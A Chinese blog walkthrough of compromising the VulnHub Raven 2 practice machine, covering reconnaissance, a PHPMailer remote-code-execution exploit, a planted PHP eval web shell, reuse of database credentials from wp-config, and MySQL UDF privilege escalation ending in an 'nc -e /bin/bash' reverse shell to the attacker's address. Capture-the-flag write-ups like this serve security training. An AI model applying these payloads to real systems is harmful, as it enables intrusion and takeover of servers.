vulnhub靶场--Raven靶场

最新推荐文章于 2025-01-15 15:47:53 发布
原创 最新推荐文章于 2025-01-15 15:47:53 发布 · 539 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #网络

vulnhub靶场–Raven靶场

信息收集

主机发现

ifconfig查看kali IP
在这里插入图片描述
nmap 192.168.23.0/24
在这里插入图片描述

端口扫描

nmap -sS 192.168.23.137 -p-
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

目录扫描

dirb http://192.168.23.137:80
在这里插入图片描述

中间件

whatweb 192.168.23.137
在这里插入图片描述

信息收集信息整理

端口开啦22端口ssh 80端口http 111端口rpcbind 45545端口

目录扫描扫出来如上dirb扫描(均可访问)可以看到有一个http://192.168.23.137:80/wordpress/目录cms或许可以利用cms漏洞提权
在这里插入图片描述
在/vendor/目录下看到一个path目录

威胁建模

在http://192.168.23.137/vendor/PATH下可以看到第一个flag和一个目录
在这里插入图片描述
flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}
在/vendor目录下好友一个.md文件看一下

渗透攻击

查看README.md文件大概可以知道服务器上安装啦PHPMailer
在这里插入图片描述
/vendor/VERSION目录下可知有一个版本号5.2.16猜测是PPMailer的版本号
在这里插入图片描述
/vendor下还有一个changelog文件下载看到
在这里插入图片描述
目前信息

服务器上有PHPMailer 版本号5.2.16/17
cms  wordpress但是并不知道版本
中间件Apache/2.4.10 (Debian) (apache我有尝试exp没有成功)

百度搜索是否有以上可以利用的漏洞
在这里插入图片描述
PHPMailer版本小于5.2.18有远程命令执行漏洞,(100条消息) PHPMailer远程命令执行漏洞复现_thelostworld-公众号的博客-CSDN博客_phpmailer漏洞复现这篇文章看下来感觉是有一个可以写mail的地方然后可以写马然后蚁剑连接在上传大马之类的

这个漏洞是因为邮件地址能够包含用引号括起来的空格,这样可以进行攻击参数的注入,CVE-2016-10033msf 搜索一下有没有可以用的模块
在这里插入图片描述
但,呃我这条路好像没有通
在这里插入图片描述
searchsploit phpmailer
在这里插入图片描述
把它cp出来
cd /usr/share/exploitdb/exploits/linux/local
cp 40974.py /home/kali/Documents/Raven2/
饿哦没能cp出来,更新一下exploit-db把~
wget http://www.exploit-db.com/archive.tar.bz2tar
-xvjf archive.tar.bz2rm archive.tar.bz2
嘿嘿我也不会更新这个库,那就谷歌搜索下载或复制粘贴进来吧
在这里插入图片描述
改完需要改的地方后运行它
在这里插入图片描述
然后监听5599端口,访问http://192.168.23.137/heihei.php
在这里插入图片描述
监听的端口接到shell
在这里插入图片描述
然后往heihei.php里面写一个小马~

echo '<?php @eval($_REQUEST['heihei']); phpinfo();?>'  >>heihei.php

cat检查一下
在这里插入图片描述
然后蚁剑连接
在这里插入图片描述
有wp文件肯定要看一下config的
在这里插入图片描述
获得啦root账户的密码
在这里插入图片描述
root 密码 R@v3nSecurity
在这里插入图片描述
成功登录MySQL,select version();查看一下sql版本这个版本存在- CVE-2016-6662漏洞
在这里插入图片描述
查找相应程序
在这里插入图片描述
wget https://www.exploit-db.com/download/1518
在这里插入图片描述
gcc -g -c 1518.c
gcc -g -shared -o 1518.so 1518.o -lc
在这里插入图片描述
在这里插入图片描述
改个名吧就叫heihie吧习惯啦
然后将heihei.so传过去
python3 -m http.server 1234
在这里插入图片描述
wget http://192.168.23.132:1234/home/kali/Documents/Raven2/heihei.so
在这里插入图片描述

后渗透攻击

use mysql;
create table heihei(line blob); #新建一个表
在这里插入图片描述
heihei,用来存放本地传来的udf文件的内容
insert into heihei values(load_file(‘/tmp/heihei.so’)); #在heihei中写入heihei.so文件内容
在这里插入图片描述
select * from heihei into dumpfile ‘/usr/lib/mysql/plugin/heihei.so’; #将.so文件内容传入新建的.so文件中
在这里插入图片描述
create function do_system returns integer soname ‘heihei.so’; #导入.so函数
在这里插入图片描述
这个地方不去看1518.c文件可能无法理解,这里的function不可以随意起名,就是当在MySQL中创建函数时,必须使用我们定义的函数名称,因此我们只能使用1518里一个名为do_system的函数,我们定义啦函数do_system 却把它叫做别的名字,这是不对的。
在这里插入图片描述
这个语句我一直报错
select do_system(‘nc 192.168.23.132 5555 -e /bin/bash’); #执行
在这里插入图片描述
说实话我在新建完.so文件时我就觉得有点乱啦(给自己挖拉个大坑)
去监听
在这里插入图片描述
这么看的话中间应该有两个flag我们没有找
find / -name “flag*”
在这里插入图片描述
/var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png
在这里插入图片描述
从蚁剑下载下来看
在这里插入图片描述

靶场练习第二十四天~vulnhub靶场Raven-1
qq_57976347的博客
02-22 1761
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A 192.168.101.127 2.网站的信息收集 (1)靶机开放了80端口,先访问靶机网站看看有什么有用的信息 1.访问到http://
VulnhubRaven2靶场(MySQL的UDF提权)
ierciyuan的博客
06-13 872
这个靶场思路清晰,主要涉及PHPMailer远程命令执行漏洞利用以及MySQL的UDF提权,本文主要展示详细的打靶过程。
vulnhub靶场Raven2
kukudeshuo的博客
07-19 2475
vulnhub靶场Raven2 环境准备 攻击机:kali(192.168.58.130) 靶机:Raven2(192.168.58.157) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80、111、56784 浏览器访问目标靶机80端口 就是一个非常普通的页面,没有啥好利用的 网站目录结构扫描 dirb http://19
vulnhub-raven
weixin_50683638的博客
12-29 2431
vulnhub-raven 靶机下载:https://download.vulnhub.com/raven/Raven.ova kali:nat模式,靶机也nat模式 探测主机 扫描端口 访问网站,查看源代码,看到service.html访问看到flag1 dirb http://192.168.11.128看到wordpress wpscan --url http://192.168.11.128/wordpress -e u hydra -l michael -P rockyou.txt 192
VulnHub-Raven
热门推荐
江左盟的博客
04-06 1万+
信息收集 使用nmap --min-rate 10000 -A 192.168.58.135 --script=vuln扫描目标主机,如图: 部分关键信息如下: Nmap scan report for 192.168.58.135 Host is up (0.00054s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8
raven靶场练习
2302_81688883的博客
07-18 667
正常流程要把里面目录都看完查找敏感信息 这里出现了敏感信息泄露,也可以说是未授权访问。http://192.168.214.133/vendor/PATH/ 发现flag。然后在针对扫描出来的端口进行详细扫描,在进行端口分析。然后把所有的目录都打开看一遍,查看有没有相关信息。发现、/verdor/路径可疑,进行搜索。流程,我们是否能在代码仓库中,控制对应的。令的目的,那么我们就要去搜索相应的有没有。这里是网页,那么写入后门的路径地址。如果环境报错按照环境安装:需要安装。在继续进行相关信息收集,在。
vulnhub靶场系列】-Lampiao靶场(脏牛提权)
m0_62484818的博客
10-28 1155
这里说一下这个爆破信息如何看,主要关注两个东西1.反回包状态码(主要注意200的状态码)2.返回包长度(主要注意与其他反回包长度不同的,或是特别大的包体),接下来继续进行攻击。编译cpp文件g++ -Wall -pedantic -O2 -std=c++11 -pthread -o xiaoli 40847.cpp -lutil。发现Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成。
vulnhub靶场Raven系列】之1,必刷推荐,考察mysql udf提权
最新发布
China_I_LOVE的博客
01-15 1410
对于网站具有php文件,可进行模糊测试,可能具有隐藏参数最好通过burp代理进行每一步操作,这样可根据数据包分析可能的步骤对于php mailer漏洞的了解与利用,编号ssh爆破的使用对于解密操作,可通过john,这里是省事,采用网站识别的提权方式这里就是因为连接mysql的用户权限过于大,并且还可以写入和导出,所以采用udf提权对于sudo提权的了解。
vulnhub---Raven1靶机
qq_43168364的博客
08-26 1013
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:Raven1靶机(192.168.15.172) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:arp-scan -l 命令:netdiscover -i eth0 -r 192.168.15.0/25 端口扫描 命令:masscan --rate=10000 --ports 0
Raven靶场
m0_62484818的博客
10-11 1917
grep命令来自英文词组global search regular expression and print out the line的缩写,意思是用于全面搜索的正则表达式,并将结果输出。人们通常会将grep命令与正则表达式搭配使用,参数作为搜索过程中的补充或对输出结果的筛选,命令模式十分灵‍活。语法格式: grep 参数 文件名常用参数:use mysql这条命令创建了一个名为"hack"的数据库表,它只有一个名为"line"的列,类型为二进制(BLOB)。
[B2R]Raven: 2靶机
weixin_43886198的博客
12-13 1075
[B2R]Raven: 2 靶场地址 靶场信息 靶场描述 Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in. Can you still breach R
Vulhub靶场raven
qq_42511731的博客
07-07 736
raven靶场渗透思路
VulnHubRaven: 2靶机的渗透测试
大方子
06-28 4658
总结和思考: 使用netdiscover探测内网存活主机 PHPMailer的漏洞反弹得到shell Python版的EXP修改 查看wordpress的wp-config.php配置文件得到数据库账号密码 MySQL版本 <= 7.14 5.6.32 5.5.51 可以利用UDF提权 KALI对EXP的编译 给程序chmod u+s 增加suid权限,可以以root权限运...
VulnHub-Raven-靶机渗透学习
嗯嗯呐的博客
11-11 1074
靶机地址:https://www.vulnhub.com/entry/raven-2,269/ 靶机描述:Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in
靶机渗透-Vulnhub-Raven
dahege666的博客
08-18 278
靶机:raven IP:192.168.239.136 攻击机:Kali IP:192.168..239.131 1、Nmap探测目标端口和服务 2、先访问80端口,从web服务开始 3、菜单栏中BLOG路径为wordpress点击,可以判断是wordpressCMS 4、先用wpscan扫一下,wpscan --url http://192.168.239.136/wordpress/ -e u 得到两个用户 5、爆破两个用户的密码,和爆破ssh密码 最后爆破...
Raven2靶场渗透】
一纸荒芜的博客
08-05 1048
Raven2靶场渗透
【甄选靶场Vulnhub百个项目渗透——项目三:Raven-2(服务利用,udf提权)
人间体佐菲的博客
09-05 1057
【甄选靶场Vulnhub百个项目渗透——项目三:Raven-2(服务利用,udf提权)
Vulnhub 靶机--Raven
Beret-81的博客
06-13 449
Vulnhub 靶机--Raven1、信息收集2、获取shell3、提权 1、信息收集 在这里发现了一个PHPmailer 存在命令执行漏洞 2、获取shell 在GitHub 找了一个exp,修改目标IP、目录、端口后,执行脚本 访问http://172.16.200.166/contact.php,此时就会生成后门文件shell.php kali开启监听,然后访问:http://172.16.200.166/shell.php 获取shell: 3、提权 在主机信息收集中获取mysql 账
raven2靶机渗透
my的博客
10-16 690
kaliraven靶机:链接:https://download.vulnhub.com/raven/Raven2.ova。
Raven-for-Redux中间件:Redux应用的错误监控解决方案
此处npm install --save raven-for-redux命令用于安装raven-for-redux库,并将其添加到项目依赖中。 2. 在用法示例中,展示了如何在浏览器环境下引入Raven,并说明了可能需要将Raven与Redux store集成。这表明了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值